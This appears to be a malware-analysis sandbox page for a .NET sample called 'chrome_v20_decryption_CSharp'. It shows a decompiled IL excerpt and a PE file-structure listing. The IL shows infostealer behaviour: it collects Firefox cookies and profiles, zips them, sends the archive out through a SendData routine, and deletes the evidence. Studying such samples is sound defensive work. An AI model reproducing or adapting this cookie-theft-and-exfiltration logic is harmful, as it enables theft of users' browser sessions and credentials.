chrome_v20_decryption_CSharp.Firefox::GetCookies() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie>::get_Count() stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ble.s IL_038E: call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldloc.s V_17 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::WriteFirefoxData(System.String) call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::CopyFirefoxProfiles(System.String) leave.s IL_03A7: nop pop <null> leave.s IL_03A7: nop nop <null> call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() stloc.s V_18 ldloc.s V_18 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0417: leave.s IL_0421 ldc.i4 500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_18 call System.String chrome_v20_decryption_CSharp.Program::ZipFolder(System.String) stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0409: nop ldloc.s V_19 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0409: nop ldloc.s V_19 newobj System.Void System.IO.FileInfo::.ctor(System.String) ldc.i4 50331648 conv.i8 <null> stloc.s V_20 callvirt System.Int64 System.IO.FileInfo::get_Length() ldloc.s V_20 pop <null> pop <null> ldloc.s V_19 call System.Void chrome_v20_decryption_CSharp.Program::SendData(System.String) nop <null> ldloc.s V_19 call System.Void System.IO.File::Delete(System.String) leave.s IL_0409: nop pop <null> leave.s IL_0409: nop nop <null> ldloc.s V_18 ldc.i4.1 <null> call System.Void System.IO.Directory::Delete(System.String,System.Boolean) leave.s IL_0417: leave.s IL_0421 pop <null> leave.s IL_0417: leave.s IL_0421 leave.s IL_0421: nop callvirt System.Exception System.Exception::get_InnerException() pop <null> leave.s IL_0421: nop nop <null> ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_0431: leave.s IL_044C pop <null> leave.s IL_0431: leave.s IL_044C leave.s IL_044C: ret pop <null> leave.s IL_044C: ret nop <null> call System.Void System.GC::Collect() call System.Void System.GC::WaitForPendingFinalizers() call System.Void System.GC::Collect() leave.s IL_044B: endfinally pop <null> leave.s IL_044B: endfinally endfinally <null> ret <null>
802aa7a4a57b22e797ebeb2b3b638527 (2.61 MB)
File Structure
802aa7a4a57b22e797ebeb2b3b638527
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
costura.bouncycastle.cryptography.dll.compressed
costura.bouncycastle.cryptography.dll
[Authenticode]_31a7df4f.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.dll.compressed
costura.costura.dll
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.costura.pdb
costura.metadata
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙